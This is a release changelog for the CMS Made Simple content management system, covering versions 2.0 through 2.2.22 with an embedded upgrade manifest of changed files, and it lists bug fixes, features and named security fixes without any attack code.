  - Automatically turn on file locking for cached files to attempt to mitigate race conditions.
    NOTE:  On systems using archaic filesystems such as FAT and FAT32 CMSMS may no longer operate.
  - cms_filecache_driver now caches for 2 hours by default and has an improved cooperative locking test
  - Implement new database abstraction library that is compatible with (functionality wise) but improves upon adodb-lite.
  - Implement protocol-less URL's in the config.
  - Page tabs are now focusable (you can tab through page tabs and use enter to select one).
  - Minor fix to the {form_start} plugin.
  - Minor change to the {admin_icon} plugin (default image class).
  - Cache more items that are queried from the database, to reduce mysql load.
  - Minor change to tree operations functionality to reduce memory usage.
  - Fixed problem with order of content blocks when using {content_module} stuff.
  - Adds get_usage_string and the concept of a type assistant to template types.
  - Minor change to auto-alias determination routine.
  - Detect module_custom enhancements in the CmsModuleInfo stuff.
  - Refactor Admin authentication.
  - More fixes to the cms_url class.
  - Optimize the include.php file.
  - Adds built-in asynchronous task processing system.
  - Adds the ability to reduce redundant mentions in the Admin log (runs asynchronously).
  - Refactor the Admin log page to allow for better filtering and pagination.
  - Admin log now uses cms_date_format and cleans output.
  - Notification functions in the CmsAdminThemeBase function are now just stubs and do nothing. Will be removed at a later date.
  - Removed the GetNotificationOutput() method from the module API.
  - Adds classes for creating Alerts. This is much more advanced than the old Notifications system.
  - Minor accessibility tweaks to the OneEleven theme.
  - Fix numerous minor problems with the OneEleven theme.
  - Refactored the OneEleven Admin theme to use new Alerts classes instead of old Notifications.
  - Refactor the OneEleven Admin theme to display an alert icon in the shortcut bar, instead of in the navigation area.
  - Fixed sidenav in the one OneEleven theme now works properly. If sidenav is larger than viewport then don't use fixed... easy.
  - In OneEleven Now revert to small sidebar navigation (still floating) if screen is too narrow.
  - Removed notification settings from MyAccount and Global Settings.
  - Removed pseudocron granularity preferences.
  - cms_alert() and the new cms_confirm() JavaScript functions now return promises.
  - Revises much code to use cms_alert and cms_confirm() instead of the standard, but browser specific functions.
  - Fixes to the cache clearing methodology.
  - No longer check for duplicate content blocks in templates... NEEDS TESTING
  - New core events: ContentPreRender, LostPassword, LostPasswordReset, StylesheetPostRender.
  - Fix problem with the default parameter to the {content} tag.
  - Fix problem with the use_smartycache thing in system information.
  - Fix notice in useroperations.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Numerous minor optimizations.
  - Add to content types the ability to set basic attributes for properties from within the page type definition.
  - Fixes problems with pagelink and link content types not being properly editable by additional editors.
  - Adds more type and content cleaning into the content types FillParams method(s).
  - Pass an explicit cacheid in to createtemplate in index.php.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.
  - The {content} tag now supports passing data attributes to the generated textarea, for use by syntax highlighter and WYSIWYG modules. i.e: {content data-foo="bar"}.
  - Refactoring of the Admin login code to be cleaner, more efficient, more secure.
  - No longer allow any modules to auto-upgrade on frontend requests.
  - Fix problem with cms_filecache_driver::clear().
  - Introduces the new Hook mechanism to allow optimizing cms_stylesheet a bit further. All core SendEvent calls are now implemented as hooks.
  - changegroupperms can now localize permission names,  and add an info string for each permission. (the listpermissions hook).
  - Adds add_headtext(), get_headtext(),  add_footertext(), get_footertext() methods to the Admin theme class.
  - minor refactoring of admin/index.php, admin/header.php, admin/footer.php and admin/moduleinterface.php.
  - now use hooks so that loaded modules can now add text to the head area of any Admin page output.
  - Change the help for the basic attributes.
  - Adds new 'switch user' functionality for members of the Admin group.
  - Re-factor the content page selector ... now supports two modes (one for a simple list, and the previous dynamic one that is faster for large sites)
    the simple list mode is used for users with limited edit capabilities on pages.
  - Adds a new Smarty plugin {page_selector} to the Admin lib.
  - New arguments to the CreateHierarchyDropdown function (deprecated) and adjust documentation.
  - Content pages now have the ability to control whether or not the page wants any more children.
  - The TemplateType class now has a help callback to optionally allow retrieving help for templates of a particular type.
  - Permissions are now grouped logically by module/originator in ChangeGroupPermissions.
  - Now use HTTPS for the latest version check.
  - Adds the public_cache_url config entry,  and make sure that the css_url uses that by default.
  - Adds many core hooks.
  - Enhance the {page_image} plugin to optionally output a full HTML img tag if there is a value for the respective property.
  - Improve the {content_image} plugin to output nothing if there is no value for the property, and to output any non-internal arguments as attributes to the HTML img tag.
  - Upgrade to an un-modified version of smarty v3.1.31.
  - Move plugins directory to lib/plugins since we now have the assets/plugins directory for custom plugins.  Upgrading should preserve any custom plugins in the /plugins directory.
  - Add new plugins {thumbnail_url}, {file_url} and {cms_filepicker).
  - Add more intelligence to the tableoption handling for DataDictionary::CreateTableSQL.
  - Minor improvements to the asynchronous behaviour of the locking functionality.
  - #11295 - Cannot change the name of a UDT, always creates new UDT.
  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.
  - #11133 - is_email() fails on domain check.
  - #11235 - munge_string_to_url leaves trailing dashes at the end of munged URL.
  - #11287 - Password reset form's password fields have different lengths.
  - Fix issue with module actions if 'content_en' block name was given on the default content block.
  - Better security when saving content pages.  Most primary fields are cast to their appropriate data type (int, bool, etc).  MenuText, and TitleAttribute can no longer contain html tags like <strong>foo</strong>.
  - Fixes issue with entities in redirecting links
  - The href/page argument to {cms_selflink} is now decoded before resolving to a page id.

Navigator v1.0.5
  - Minor optimizations.
  - Now use pageid in calculations of cacheid.
  - Now output template help to Navigator.

Installation Assistant v1.3
  - Only create dummy index.html files in subdirectories we created.
  - Clear cache after step 9.
  - Upgrade routine now asks for, and tests database credentials.
  - Upgrade routine now rewrites the config.php file (but keeps a backup).
  - Set a few more preferences to reasonable defaults on install. Specifically related to site cleanup and performance.
  - On installation, now insure that tmp/cache and tmp/templates_c directories are empty.
  - Now displays if files are going to be skipped.
  - Adds clear option for development purposes.
  - No longer ask to save database password.
  - On install now create the assets directory structure.
  - On upgrade (for 2.2) now create the assets directory structure and move tmp/configs, tmp/templates, module_custom, admin/custom, etc. within it.
  - When using the expanded installer allow changing the destination directory on step 1.
  - Check for existing files in the installation directory for new installations.
  - Added more notes to aide in diagnosing white screens
  - Modify package .zip files so that extracted files will usually have 644 permission (depends on the unzip routine used).

CmsJobManager
  - New core module to handle queued asynchronous tasks.

Content Manager
  - Minor tweak to bulk delete pages.
  - Minor fix to the active tab when changing a template or design.
  - Now listen to the 'default parent page' user preference.
  - Fix minor XSS problem in the Admin if some loser puts JavaScript into the title field or alias field or menu text field.
  - Now allow filtering pages by owner, editor, template, or design.  Only for Administrators with Modify any page, or Manage all content permissions.
  - Fix problems with auto-refresh being too fast for some operations.
  - Now auto scroll to the first matched page in a find.
  - Additional editors of a page cannot change the content type. Only owners, or users with the Manage all Content permissions.
  - Fix a problem with the call to GetTabElements.

DesignManager
  - Move the designs tab of the main interface into third position.
  - Implement sorting in edit design.
  - Remove option menus (for now) from templates, stylesheets, and designs tab.
  - Modify the template list functionality in edit-design to allow using keyboard control. Space or + to select an item on the left, and right arrow to move.
  - Modify the edit-design functionality to allow clicking on an attached template or stylesheet to edit it.
  - Generic templates now display a usage string.
  - When creating a new template, associate the new template with the default design.
  - Add reset buttons to the filter forms.
  - No longer check for default content block in a template.
  - Adds the ability to export a template to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/templates directory corresponding to a template name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple templates.
  - In the template list, if a file exists for a template... display it in the filename column.
  - Adds the ability to export a stylesheet to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/css directory corresponding to a stylesheet name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple stylesheets.
  - In the stylesheet list, if a file exists for a stylesheet display it in the filename column.

News v2.51
  - Minor fix to add category.
  - Removes GetNotificationOutput method.
  - Add a task that runs at least every 15 minutes to detect draft articles... create an alert for this.
  - Add an option to never create alerts about draft News articles.
  - Minor optimizations.
  - Adds postdate as parameters in events.
  - now output template help to Navigator.
  - Adds new 'linked file' type field that allows selecting a file using the filepicker.
  - Changes the default summary and detail templates to support the linked_file field type, and uses {thumbnail_url} and {file_url}.

FileManager v1.6.3
  - Move settings to it's own menu item under Site Admin.
  - Fix minor problem with moving a directory.
  - Minor fix to move file functionality.
  - Adds OnFileDeleted event.
  - Adds 'view raw file' icon in each viewable row.
  - Minor formatting changes in file list.
  - Now display clickable path entries for easier navigation.

Search
  - Convert to store all data using the InnoDB engine.
  - Use transactions for the addwords and deletewords stuff for performance.
  - Fix problem with query and record expiry.

AdminSearch v1.0.3
  - Fixes problem with use of 'Use Admin Search' permission.
  - Now searches for matching strings within templates and stylesheets that are stored as files.
  - Now listens to the HasSearchableContent metod when searching content pages.

ModuleManager
  - Now detect if module_custom directories exist and are populated and warn about this before upgrading a module.
  - Minor string changes.
  - Improvements to error handling in the new versions tab.
  - Write a confirmation form for uninstalling a module that displays the UninstallPreMessage or uses a default.
  - Now don't allow disabling / uninstalling myself.
  - Don't hide the upgrades tab when there are no upgrades, but show the number of upgrades in the tab title instead.
  - Now use HTTPS for requests to ModuleRepository.
  - Trigger a hook before exporting a module to XML.

MicroTiny v2.1
  - New version of the tinymce wysiwyg editor.
  - Adds a mailto plugin.
  - Now use the FilePicker module for a filepicker, required rewriting the cmsms_filepicker tinymce plugin.
  - Enable the title attribute on the image plugin.
  - Now uses PUBLIC_CACHE_LOCATION for cache files instead of hardcoding tmp/cache


Version 2.1.6 - Spanish Wells
----------------------------------
Core - General
  - Now attempt to detect if a template name passed into CmsModule::GetTemplateResource() is already a resource string.
  - endswith is now an accepted function in Smarty templates (fixes typo in security policy).
  - Fixes for CmsNlsOperations when using a language detector.
  - Fixes warnings in useroperations.
  - Fixes problem with cms_selflink dir='up' since 2013.
  - Modifies the OneEleven theme to set the meta referrer attribute for security purposes.
  - Modifies the functionality of the CSRF tokens to be more secure (only set the cookie in one location, only set the session variable from the cookie).
  - Increase Admin users list limit.
  - Reduce time limit for daily version check to 3 seconds.
  - cleanValues in Admin log and List Content.
  - Minor fix to the relative_time plugin.
  - Admin menu item URLs can now be built from the remaining members of the object, if not specified.
  - {content_image} and {content_module} now preserve order properly and support the priority attribute.

  - #11198 - Fixes problem with cms_selflink with aliases that starts with a numeric sign.

Content Manager v1.1.4
  - Fix bulk set-non-cachable functionality.
  - Fix a bug wrt content blocks and the adding flag.

Installation Assistant v1.0.4
  - Adds recommended check for ZipArchive.
  - Improves method of determining a temp directory.

ModuleManager v2.0.5
  - Improves functionality if ModuleRepository is not available.

News v2.50.6
  - Minor fix to editing news articles from the Admin interface.


Version 2.1.5 - High Rock
----------------------------------
Core - General
  - Fix fatal error if an extcss stylesheet was placed in the Admin theme.
  - Another minor fix to clearing cached files.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Improve the way page aliases are munged when they are supplied.
  - Improve the error generated when a page alias cannot be generated.
  - Minor fixes to the form_start plugin.
  - Minor fixes to generation of moduleinfo.ini.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.

  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.

Content Manager
  - Improve error handling in Edit Content.
  - Fix a problem with the call to GetTabElements.

Design Manager
  - Fix problem with resetting a template back to factory defaults, or creating a new template from factory defaults.

Module Manager
  - Improve the way modules with dependencies are installed and upgraded. (Got rid of the queue stuff).

AdminSearch
  - Use 'Manage Stylesheets' permission, not 'Modify Stylesheets' when searching stylesheets.

Phar Installer
  - Adds missing 'Manage Stylesheets' permission that would not be created on upgrade from 1.12.



Version 2.1.4 - Freetown
----------------------------------
Core - General
  - Fix to the clear_cached_file() method which should fix problems with module installation.
  - Minor tweak to distributed sample htaccess.txt file.

Phar Installer
  - Fixes issues with respect to hanging on step 7 when suhosin PHP addon was installed.
  - Minor PHP7 Fixes.

Module Manager
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.


Version 2.1.3 - Black Point
----------------------------------
Core - General
  - Security fix to prevent HTTP_HOST attacks. Many thanks to I-TRACING (www.i-tracing.com) for reporting it!!
  - Remove stub .htaccess files from subdirectories.
  - Update the included sample htaccess.txt file for security.
  - Fix for endless loop when calculating a page alias in utf-8 environments.
  - Fix for endless loop when calculating a page alias and a page name/title ended with -
  - Fixes a notice on the login page.
  - Optimize LoadContentFromId() to be typesafe, and use default page, if the id passed in is invalid.
  - Fix error condition if there were no default default design, or default page template.
  - Fix problem with system verification.

  - #10825 - Admin-account settings don't remember startpage if you set one
  - #10874 - When creating a page and the title has specific characters, CMSMS stops responding
  - #10910 - content and content_module order incorrect Admin page
  - #10911 - 'Use Admin Search' permission not being used in 2.1.2
  - #10921 - Content Field to Display in Name Column not used

AdminSearch v1.0.1
  - Minor fix to permissions checks.

Navigator v1.0.3
  - Improved exception handling on install

News v2.50.5
  - Fix error condition if no results were returned.

Installation Assistant v1.0.3.1
  - Tweaks to README files.
  - Improved error handling in some circumstances.
  - Fix some PHP7 issues.

FileManager
  - #10871 - Filemanager moving folder


Version 2.1.2 - Andros Town
----------------------------------
Core - General
- Minor fix to missing language string stuff
- Fixes to home page preferences
- API documentation fixes (minor)
- Fixes for ajax_content (the Ajax routine behind the parent selector in edit content) to handle ordering inconsistencies
- Remove die statement in is_email
- Minor fix to the relative_time modifier
- Upgrade CMSMailer to 6.2.14
- Now do a check for E_ALL in the system info

News v2.50.4
- Now all field definitions can be deleted
- Minor fix to default action if no results were returned...

ModuleManager v2.0.2
- Revamp module dependency calculations when installing a module
- Minor fix for some notices in install and upgrade modules
- Minor typo fixes
- Minor fixes for PHP7

MenuManager  v1.50.2
- make sure that uninstall cleans up properly

MicroTiny v2.0.3
- minor template fix
- fixes for stylesheet overrides


Version 2.1.1 - Nicholls Town
----------------------------------
Core - General
- Fix the template compiler so that content blocks can be placed within sub templates and detected with the {include} tag
- Fix minor problem with checksum verification
- Fix to the cms_cache_handler class
- Minor fix to SetAllPageHierarchies()
- Correct location where session was started in frontend displays
- Fix the default option for {content_image}
- Modify the locker to use a beacon if supported, when unlocking
- Fix missing permissions when a 1.12 site was upgraded (installation assistant)

CMSContentmanager v1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear content locks (Admins can clear all locks, regular users can only clear their locks)
- Enhancements to the action to bulk set designs to show only page templates by default, but to optionally show more

DesignManager v1.1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear template and CSS locks (Admins can clear all locks, regular users can only clear their locks)


Version 2.1 - Bahamas
----------------------------------
Core - General
- Minor performance tweaks to sample htaccess.txt
- Minor fix to the ProcessTemplateFromDatabase module API method.
- Improvements and re-factor the way headers are sent wrt caching
- Add a new method to the ModuleOperations class to allow a module to be within a namespace.
- Enhances the Group class.
- Enhancements and fixes to the cms_url class.
- Modified the $mod->smarty reference to be smarter... it is now deprecated.
- Fixes issue with https requests (#10697)
- Modifies The CmsLayoutTemplate class and CmsLayoutTemplateQuery to allow filtering on listable or non listable
  or setting a template as listable (default) or non listable
- Fixes a problem with styling of the login form if tasks must be run AND a module needs upgrading.
- Fixes to the cloning of templates in CmsLayoutTemplate
- Fixes problem with SetAllHierarchyPositions that cleared the entire cache instead of only the necessary part of it.
- Adds the unloadCancel handler to the lockManager jQuery plugin.
- Moves version.php and include.php inside the lib directory so that they are easier to protect from unwanted direct access.
- Fixes to page alias tests when manually entering a page alias.
- Missing language strings are no longer output to Admin log, but to the debug log.
- Requests for modules that are not installed/enabled, or for invalid actions will now result in 404 errors.
- Fixed problem where restricted content editors could implicitly change the page alias.
- Improvements to the system information page, particularly the bbcode output.
- cms_init_editor, form_start, and cms_action_url plugins are no longer cachable.
- Adds the 'adminonly' option to the {content}, {content_image}, and {content_module} tags to allow only members of the 'Admin' group to manipulate the values of that block.
- Add a trivial check to the sitedown message to make sure that it is not empty.
- Minor fixes for PHP 7

MicroTiny v2.0.2
- Now add page hierarchy to autocomplete text when using the linker.
- Now use $smarty->CreateTemplate for clarity when compling the config template
- Now explicitly assign urls so that they do not get caced by smarty.
- Slightly tweak the default HTML content in the example tab.
- Updated tinymce to the latest 4.2.7 version, included the 'paste' plugin, and turned on 'paste_as_text'.
- Added the ability to enable the table plugin, now distribute the table plugin

CMSContentManager v1.0.2
- Fix problem with pagedefault metadata.
- Fixes for handling no listable templates for a design
- More work with locking.  With only one exception all locking and unlocking is initiated via javascript.
- Minor fix to copycontent

DesignManager v1.1
- Adds ability to toggle the listability of a template.
- Fixes problems with lost changes if there is a syntax error in the template.
- More work with locking.  With only one exception all locking and unlocking is initiated via JavaScript.

News v2.50.3
- Fixes minor issue with pagination in News Admin console.
- Fix errors in the default form template.
- Fixed URL to long issues on redirection after adding/editing article.

Search v1.50.2
- Minor PHP7 fixes.

ModuleManager 2.0.1
- Minor fix to which modules could be uninstalled and deactivated.


Version 2.0.1.1 - Adelaide
----------------------------------
Fix to the $this->smarty magic method in the module class to resolve to the action template or the global Smarty.


Version 2.0.1 - Adelaide
----------------------------------
Core - General
- Improved optimization in ContentOperations::SetAllHierarchyPositions.
- Fixed return type of ContentOperations::GetPageIdFromAlias().
- Help for the {cms_html_options} plugin.
- Change the default page template to use {Navigator}.
- Explicitly force $smarty->fetch() to create a new template, and therefore a new scope. Keep track of scopes in a stack.
- Change prototype to CMSModule::DoActionBase to pass in the current template object.
- SITENAME is now assigned as a Smarty global.
  (fixes some variable scope issues)
- Fix problem with changing content types.
- Fix problem with CmsLayoutTemplateQuery wrt the editable option, that generated an SQL error.
  (resolves problems where people have additional editor access to templates, but no other design manager permissions).
- Fix minor JavaScript errors in plugin (error checking).
- Fix problems where If assign was passed to a {content} tag, do not pass it to the module on a mact request.
- Implements the completely forgotten 403 exception stuff and the IsPermitted content method.
- Improve the cmsms_dirtyform jQuery plugin to support the unload handler and an onUnload callback.
- Fixed the jQuery page selector plugin when the current value points to an invalid page,  and fixes for asynchronous Ajax.
- Adds a globally available cms_busy() JavaScript function for the Admin.
- Fix problem with html entitites in email addresses in user settings.
- Fix problem with {content cssname=string} and quotes.
- Changed cmsms plugins to use $smarty->getTemplateVars() instead of $smarty->get_template_vars() because of scope issues.
- Minor fix to {form_start} when not used in a module.
- Improved error handling for cms_stylesheet.  Now will generate a message in the Admin log, and an html comment on error.

CMSContentManager v1.0.1
- Fixes for changing content types.
- Adds a title for some contextual help if a template is not available for a content item.
- Clear any locks if an exception occurred while submitting a content item.
- Improvements to error handling with apply and preview.
- Content list now refreshes every 30 seconds to display up-to-date lock information.

DesignManager v1.0.1
- Clear the type_default flag when copying a template.
- Clear any locks if an exception occurred while submitting a template.
- Clear any locks if an exception occurred while submitting a stylesheet.
- Template and stylesheet lists now refresh every 30 seconds to display up-to-date lock information.
- Fixes for design exporting templates with protocol-less URLs in them.

MenuManager v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

Navigator v1.0.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Minor change to the help ($node->children_exist)

Search v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

News v2.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Fix problem with custom fields not being assigned in fesubmit.
- Fix minor problem with html entities in the detail template parameter.

FileManager v1.5.1
- Fix minor problem with Smarty scope in the drop zone.


Version 2.0 - Australia
----------------------------------
+++ Initial Release +++
MANIFEST.DAT000066600000001610146276211140006312 0ustar00MANIFEST GENERATED: 1717510732
MANIFEST FROM VERSION: 2.2.20
MANIFEST FROM NAME: Saguenay
MANIFEST TO VERSION: 2.2.21
MANIFEST TO NAME: Sherbrooke
CHANGED :: 0013cc80ce21728ac2aa579fb5c22744 :: admin\themes\OneEleven\templates\navigation.tpl
CHANGED :: e8032139add91c8191bdc42e5a31ad63 :: doc\CHANGELOG.txt
CHANGED :: 7e44fe9c294531e6bcf22cfe788812c7 :: lib\classes\contenttypes\Content.inc.php
CHANGED :: b7e4cb024818391016491bdd5a32e0f0 :: lib\classes\contenttypes\ErrorPage.inc.php
CHANGED :: bee6714b10e016f38e7edf7486ddff65 :: lib\classes\internal\class.page_template_parser.php
CHANGED :: 308b85e3e83a368f102034b6088f3be6 :: lib\html_entity_decode_php4.php
CHANGED :: f4b38d76dd320b4045038e869d688a75 :: lib\version.php
CHANGED :: 1531eeca3b3e0e2fc2f3a7d7713114f3 :: modules\Navigator\Navigator.module.php
CHANGED :: c803ed8eec0ce92542ed4d023f83b689 :: modules\News\lib\class.DraftMessageAlert.php
Version 2.2.22 - Saskatoon
-------------------------------

Core - General
 - Fixed BR12711 - replace FILTER_SANITIZE_STRING in admin/siteprefs.php
 - Fixed BR12701 - Internal Page Link fixed to now include section headers that have children
 - Fixed BR12704 - User tag correctly updated message now automatically hides after 10 seconds
 - Fixed BR12658 - removed redundant string & other language file tweaks
 - Fixed BR12749 - Saving an UDT error fixed - saving the UDT parses the code but no longer executes
 - in case the php headers fail to be correctly interpreted fallback on pure HTML
 - make sure login form doesn't cache at all to avoid redirect loop on some server configurations
 - re-enforce the no caching of backend pages for some server configurations and browsers
 - upgraded to Smarty 4.5.5;
 - fixed the UserOperations::IsSuperuser method when $uid is not 1 (default for an installation) but not necessarily kept the same during the lifecycle of the site;
 - Removed MenuManager from the package;

Content Manager 1.1.14
 - Default page deletion bug on copy fixed

Search Module 1.54
 - Fixed BR12727 - Search Module bug fix to remove error if no result found

 FilePicker 1.0.9
 - Fixed BR #12666 - Logs display problem in Admin Log
 
 Phar Installer 1.4.3
 - Upgraded Smarty to version 4.5.5;
 - Regular Phar still doesn't support Windows at this point while Expanded Phar does because of a Smarty issue while being served from the phar installer;
 - Updated the installer README file;


Version 2.2.21 - Sherbrooke
-------------------------------

Core - General
 - Fixes BR 12714 inherited content Fields from a base templates are missing in child templates (backend edit);
 - Fixes BR 12713 Pages extended of a page base can't be edited, if they don't contain a {content} tag;
 - Fixes a typo in class ErrorPage: missing line break after #[\AllowDynamicProperties] directive;


 Version 2.2.20 - Saguenay
-------------------------------

Core - General
 - Compatibility fixes for PHP 8.2 and 8.3;
 - Smarty upgraded to version 4.5.2 (latest of the stable 4.5.x branch);
 - Made some changes to keep backward compatibility with previous versions of Smarty;
 - Fixed BR #12683: we now truncate the item_name at 50 characters;
 - Moved php files with functions to a specific folder tidying up for further changes;
 - Deprecated cms_html_entity_decode: scheduled to be removed; PHP native html_entity_decode now supports UTF-8 properly;
 - Fixed BRs #12677 and #12703: UDTs errors are now handled more gracefully - the error being triggered is shown on the popup;
 - News module is no longer mandatory;
 - New module added to core (UserGuide);
 - Installer now supports optional modules (News and UserGuide);
 - MenuManager is no longer installed back on upgrades;
 
Content Manager 1.1.13
 - Fixed a typo in admin_editcontent.tpl;
 
CmsJobManager 1.0.0
 - Considered a stable release, version is now 1.0.0;
 - Compatibility fixes for PHP 8.2 and 8.3;
 
DesignManager 1.1.11
 - Compatibility fixes for PHP 8.2 and 8.3;
 
FilePicker 1.0.8
 - BR #12671 - fix FilePicker prefix error;
  
MicroTiny 1.6.5
 - Compatibility fixes for PHP 8.2 and 8.3;
 - Removed mt_jsbool as it is not needed any longer and was breaking Smarty compatibility; 
 
Navigator 1.0.11
 - Compatibility fixes for PHP 8.2 and 8.3;

News 2.51.13
 - Compatibility fixes for PHP 8.2 and 8.3;
 - News is now an optional module, no longer installed by default;
 
UserGuide 1.0.0
 - Initial release;
 
Phar Installer Not SET
 - Compatibility fixes for PHP 8.2 and 8.3;
 - Supports core optional modules selection on advanced mode (currently News and UserGuide);
 - Modified Smarty 4.2.1 enough to work with PHP 8.3;
 - Regular Phar doesn't support Windows at this point while Expanded Phar does; 


Version 2.2.19 - Selkirk
-------------------------------

Core - General
 - BR #12647 - Wrong default action value in get_pageid_or_alias_from_url;
 - FR #12638 - ability to add CSP headers on the backend: currently weak restrictions: self with script-src and script-src-elem set to unsafe-inline (optionally set on config admin_csp_header);
 - BR #12661 - fix page_selector allow_all parameter and set default to false;
 
Content Manager 1.1.12
 - BR #12635 - Apply button is shown for non-existing page;
 - BR #12474 Taking the default page down by accident through the content type;

File Manager 1.6.16
 - BR #12659 - FileManager upload Warning bug fix;

FilePicker 1.0.7
 - BR #12621 - FilePicker upload bug;
 - BR #12659 - FilePicker upload Warning bug fix;

Navigator 1.0.10
 - BR #12528 Navigator call doesn't clear excluded prefixes in some situations

Version 2.2.18 - Apex
-------------------------------
Core - General
 - Fallback function CMSMS\strftime. PHP Intl extension still recommended. The fallback solves issues on hosts that don't install it by default and don't allow users to install it.

Version 2.2.17 - Iqaluit
-------------------------------
Core - General
 - BR #12529 - Cacheable Pages have Bad Header Last-Modified;
 - BR #12543 - Lib file corrections;
 - BR #12618 - HasChildren() is broken;
 - BR #12587 - can't uninstall modules;
 - Compatibility fixes for PHP 7, 8.0 and 8.1;
 - Smarty upgraded to version 4.2.1;
    Note: Smarty 2 syntax is still supported, but deprecated
 - Add function CMSMS\strftime to replace deprecated PHP function. PHP Intl extension recommended to support this.
 - Enabled use of PHP functions trim,ltrim,rtrim in smarty templates
 - PHPMailer upgraded to version 6.6.0.
 - fixes BR #12529 Cacheable Pages have Bad Header Last-Modified;
 - added module's support for arrays in parameters;
 - Fixes to cms_mailer class mainly in terms of proxy design pattern getters and setters and autotls settings;
 - Smarty security policies changes: due to some modifications in the way updated Smarty now behaves, all static classes need to be registered for its use to be allowed in templates.

Content Manager 1.1.10
 - Differentiate new page from cloned page.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Design Manager 1.1.10
 - BR #12545 - Module: DesignManager typo info on top file.
 - fixes typo BR #12545
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FilePicker 1.0.6
 - BR #12539 - Module FilePicker 1.0.5 files corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Module Manager 2.1.9
 - BR #12541 - Module ModuleManager 2.1.8 : corrections + compatible php 7.1.0 to 8.1.4.

News 2.51.12
 - BR #12543 - Lib file corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FileManager 1.6.13
- Compatibility fixes for PHP 7, 8.0 and 8.1.


Version 2.2.16 - Truro
-------------------------------
Core - General
  - BR #12370 - Admin Log-Download : now downloading the log honors all filters but doesn't process paging.
  - BR #12437 - Installer won't allow "<" symbol in database password.
  - BR #12457 - Event Manager empty list when mysql mode only_full_group_by.
  - BR #12484 - Cannot exit after Run UDT.
  - BR #12495 - MySQL 8.0.2+ breaks groups without table prefix.
  - BR #12499 - adminlog.tpl Wrongly formed date.
  - BR #12500 - NameQuote function does not work properly.
  - BR #12504 - Function call notification.
  - Fixed an issue with specific characters in a content block tab name breaking the editor.
  - Adjust regex's incompatible with PCRE2.
  - Avoid deprecated strftime() - deploy new replacement function locale_ftime() and new modifier-plugin localedate_format.
  - A number of fixes for PHP 8 compatibility.

Admin Search v1.0.6
  - BR #12443 - Admin Search fails on some searches with default mysql mode only_full_group_by (mysql 5.7.5+).
  - Removed license and copyright notices from module help text.
  - Escaping the search input field values.
  - More content object attributes are searched.
  - User Defined Tags can be searched.
  - Only places a user has permission to search are shown in the filter list (cached!).

Content Manager v1.1.9
  - Fix menu text/title setting.

FileManager v1.6.12
  - BR #12435 - Replacing an image file in filepicker doesn't update thumbnail.

FilePicker v1.0.5
  - FR #12483 - Additional FilePicker Help for usage as Content Block.

Navigator v1.0.9
  - BR #12456 - Navigator breadcrumbs with default page hidden from menu causes PHP notice.

Search v1.53
  - Added 'Manage Search' permission.
  - BR #12391 - Core search issue page/entry titles that start with numbers.
  
Phar Installer v1.3.15
  - Fixed BR #12437 - Installer won't allow "<" symbol in database password.
  - Added Russian lang file to installer.
  - use locale_ftime() instead of deprecated strftime().
  - escape name of groups table, to prevent reserved-word conflict when table-prefix is empty.
  - alterations to the links in final step: we now privilege links to CMSMS channels of contact and support.


Version 2.2.15 - Bonaventure
-------------------------------
Core - General
  - BR #12287 - Admin shortcuts popup refers to IRC.
  - BR #12292 - showbase parameter of metadata tag doesn't accept boolean value.
  - BR #12303 - No date displayed in the admin + category id not incremented.
  - BR #12305 - Removing actual Destination Page breaks Destination Page dropdown in Internal Page Link pages.
  - BR #12311 - log_performance_info - undefined variable: queries.
  - BR #12313 - 5 Stored XSS vulnerabilities in Settings - Content Manager.
  - BR #12317 - XSS on Settings News Module.
  - BR #12325 - Several XSS vulnerabilities.
  - BR #12335 - User pref admin homepage not properly displayed under certain conditions.
  - BR #12337 - GetContentBlockFieldInput $adding always false.
  - BR #12338 - Allow http/2 responses.
  - BR #12357 - Filepicker dropzone size issue.
  - FR #12345 - More user friendly admin session handling (partly implemented).
  - FR #12349 - Swap tabs on System Maintenance page.
  - Browsing to the main admin page in a new browser tab during a running session won't redirect to login form anymore.
  - (Error) messages in OneEleven won't dismiss on click.
  - Fix to Admin redirection after login on Windows platform.
  - Fix to the module API redirection to support arrays in parameters.

FileManager v1.6.12
  - Dropzone improvement like core FilePicker.

FilePicker v1.0.5
  - BR #11673 - FilePicker will not show svg images, when in the Content Manager.
  - BR #12312 - Stored XSS vulnerability in File Picker.

News v2.51.11
  - Minor code fix to encoding title content.
  - BR #12322 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12325 - Several XSS vulnerabilities.

Design Manager v1.1.9
